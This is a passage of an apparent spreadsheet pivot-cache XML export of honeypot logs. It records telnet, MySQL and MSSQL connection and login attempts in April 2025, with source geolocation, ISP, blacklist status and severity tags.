    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2280"/>
    <x v="2280"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T06:59:32"/>
    <d v="2025-04-11T06:59:32"/>
    <d v="2025-04-11T06:59:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Tsing Yi"/>
    <s v="1818483"/>
    <s v="NA"/>
    <s v="22.3484"/>
    <s v="114.112"/>
    <s v="9304"/>
    <s v="HUTCHISON-AS-AP"/>
    <s v="HGC Global Communications Limited"/>
    <s v="corporate"/>
    <s v="HGC Global Communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:768d:a457"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2281"/>
    <x v="2281"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T06:51:48"/>
    <d v="2025-04-11T06:51:08"/>
    <d v="2025-04-11T06:51:48"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Umraniye"/>
    <s v="738377"/>
    <s v="NA"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL ILETISIM HIZMETLERI A.S."/>
    <s v="Turkcell Internet"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8dc4:85b8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2282"/>
    <x v="2282"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T06:47:07"/>
    <d v="2025-04-11T06:47:07"/>
    <d v="2025-04-11T06:47:07"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:5fe5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2283"/>
    <x v="2283"/>
    <s v="114-33-163-172.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-11T06:11:30"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-11T06:11:30"/>
    <n v="388"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H27&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;58423&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:a3ac"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2284"/>
    <x v="2284"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T06:05:40"/>
    <d v="2025-04-11T06:04:35"/>
    <d v="2025-04-11T06:05:40"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="22"/>
    <s v="Nghệ An Province"/>
    <s v="Thành Phố Vinh"/>
    <s v="Yên Vinh"/>
    <s v="1560037"/>
    <s v="NA"/>
    <s v="18.6667"/>
    <s v="105.667"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2007-01-11"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7b19:5595"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2285"/>
    <x v="2285"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T06:04:57"/>
    <d v="2025-04-10T16:44:01"/>
    <d v="2025-04-11T06:04:57"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c1:faf9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2286"/>
    <x v="2286"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T05:59:01"/>
    <d v="2025-04-11T05:59:01"/>
    <d v="2025-04-11T05:59:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:ea40"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2287"/>
    <x v="2287"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T05:47:20"/>
    <d v="2025-04-11T05:46:04"/>
    <d v="2025-04-11T05:47:20"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="O"/>
    <s v="Västra Götaland"/>
    <s v="Gothenburg Municipality"/>
    <s v="Gothenburg"/>
    <s v="2711537"/>
    <s v="400 10"/>
    <s v="57.7089"/>
    <s v="11.9746"/>
    <s v="39351"/>
    <s v="31173 Services AB"/>
    <s v="31173 Services AB"/>
    <s v="hosting"/>
    <s v="31173 Services AB"/>
    <s v="2017-07-19"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9d5:9aba"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2288"/>
    <x v="2288"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T05:27:19"/>
    <d v="2025-04-11T05:27:19"/>
    <d v="2025-04-11T05:27:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:9ed"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2289"/>
    <x v="2289"/>
    <s v="45-184-71-64.canaatelecom.net.br&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-11T04:56:57"/>
    <d v="2023-09-12T00:57:00"/>
    <d v="2025-04-11T04:56:57"/>
    <n v="636"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H38"/>
    <s v="23&amp;&amp;21776&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="DF"/>
    <s v="Federal District"/>
    <s v="Brasília"/>
    <s v="Brasília"/>
    <s v="3469058"/>
    <s v="NA"/>
    <s v="-15.7797"/>
    <s v="-47.9297"/>
    <s v="269359"/>
    <s v="CANAA TELECOMUNICAÇÕES LTDA - ME"/>
    <s v="CANAA TELECOMUNICAÇÕES LTDA - ME"/>
    <s v="business"/>
    <s v="CANAA TELECOMUNICAÇÕES LTDA - ME"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2db8:4740"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2290"/>
    <x v="2290"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T04:44:14"/>
    <d v="2025-04-11T04:39:03"/>
    <d v="2025-04-11T04:44:14"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Várzea Paulista"/>
    <s v="Várzea Paulista"/>
    <s v="3445446"/>
    <s v="NA"/>
    <s v="-23.2114"/>
    <s v="-46.8283"/>
    <s v="4230"/>
    <s v="CLARO S.A."/>
    <s v="Claro S.A."/>
    <s v="business"/>
    <s v="Claro S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bf38:4630"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2291"/>
    <x v="2291"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T04:35:07"/>
    <d v="2025-04-11T04:35:07"/>
    <d v="2025-04-11T04:35:07"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:4f3d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2292"/>
    <x v="2292"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T04:33:51"/>
    <d v="2025-04-11T04:33:51"/>
    <d v="2025-04-11T04:33:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Ajmer"/>
    <s v="Ajmer"/>
    <s v="1279159"/>
    <s v="305001"/>
    <s v="26.4499"/>
    <s v="74.6399"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:2524"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2293"/>
    <x v="2293"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T04:01:27"/>
    <d v="2025-04-11T04:01:27"/>
    <d v="2025-04-11T04:01:27"/>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d:5cc4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2294"/>
    <x v="2294"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T03:42:35"/>
    <d v="2025-04-11T03:42:35"/>
    <d v="2025-04-11T03:42:35"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon City"/>
    <s v="1819607"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3182:ab22"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2295"/>
    <x v="2295"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T03:16:51"/>
    <d v="2025-04-11T03:16:51"/>
    <d v="2025-04-11T03:16:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fe:1983"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2296"/>
    <x v="2296"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T03:11:59"/>
    <d v="2025-04-11T03:09:33"/>
    <d v="2025-04-11T03:11:59"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Howrah"/>
    <s v="Howrah"/>
    <s v="1270396"/>
    <s v="NA"/>
    <s v="22.5769"/>
    <s v="88.3186"/>
    <s v="23860"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="Alliance Broadband Services"/>
    <s v="residential"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="2016-05-10"/>
    <s v="ALLIANCEBROADBAND-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2df9:4414"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2297"/>
    <x v="2297"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T02:48:52"/>
    <d v="2025-02-15T01:26:58"/>
    <d v="2025-04-11T02:48:52"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="NA"/>
    <s v="21.1959"/>
    <s v="72.8302"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-05-04"/>
    <s v="HATHWAY-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7448:1032"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2298"/>
    <x v="2298"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T02:44:51"/>
    <d v="2025-04-11T02:44:51"/>
    <d v="2025-04-11T02:44:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="East"/>
    <s v="Shakar Pur Baramad"/>
    <s v="13156977"/>
    <s v="NA"/>
    <s v="28.6208"/>
    <s v="77.2794"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
